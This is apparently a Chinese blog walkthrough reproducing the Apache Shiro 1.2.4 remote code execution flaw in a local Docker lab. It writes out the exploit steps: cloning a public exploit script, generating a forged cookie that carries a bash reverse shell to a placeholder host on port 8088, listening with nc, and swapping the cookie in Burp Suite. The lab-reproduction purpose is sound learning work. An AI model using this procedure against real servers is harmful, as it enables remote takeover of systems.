• Apache Shiro 小于1.2.4 RCE 漏洞复现


    1.首先说一句这破漏洞折腾了好久,才复现成功

    环境搭建docker

    ####获取docker镜像
    
    docker pull medicean/vulapps:s_shiro_1
    
    ####重启docker
    
    systemctl restart docker
    
    ####启动docker镜像:
    
    docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
    
    访问:
    
    http://localhost:8081/ 环境搭建成功
    

     2.下载攻击exp

    git clone https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE.git
    

     首先生成一个伪造的cookie

    root@Mke:~/Apache_Shiro_1.2.4_RCE# python3 shiro_1.2.4.py "echo '/bin/bash -i >& /dev/tcp/x.x.x.x/8088 0>&1' >> a.txt &&bash a.txt"

    注意:这里我这样写的原因是因为之前复现好几次,都无法反弹shell,最后不得已这样写,先把反弹shell写入a.txt,然后再执行反弹shell的操作

    3.监听反弹的端口

    nc -lvp 8088

     4.登入shiro然后用burpsuite抓取数据包

    burpsuite抓包然后进行替换cookie

    替换cookie

    5.查看监听端口,是否有shell弹回来

     到这里算是复现成功了(qieyiweinabudaoxitongkongzhiquanxianjiubusuanfuxianchenggong!!!)

     

     

  • 相关阅读:
    【BP算法】
    【C++问题整理】
    【最大回文长度】
    【连通区域个数】
    Redis的复制(Master/Slave)、主从复制、读写分离 (下)
    Redis的复制(Master/Slave)、主从复制、读写分离
    Redis发布订阅
    Redis事务
    Redis持久化
    Redis配置文件
  • 原文地址:https://www.cnblogs.com/mke2fs/p/12618805.html
Copyright © 2020-2023  润新知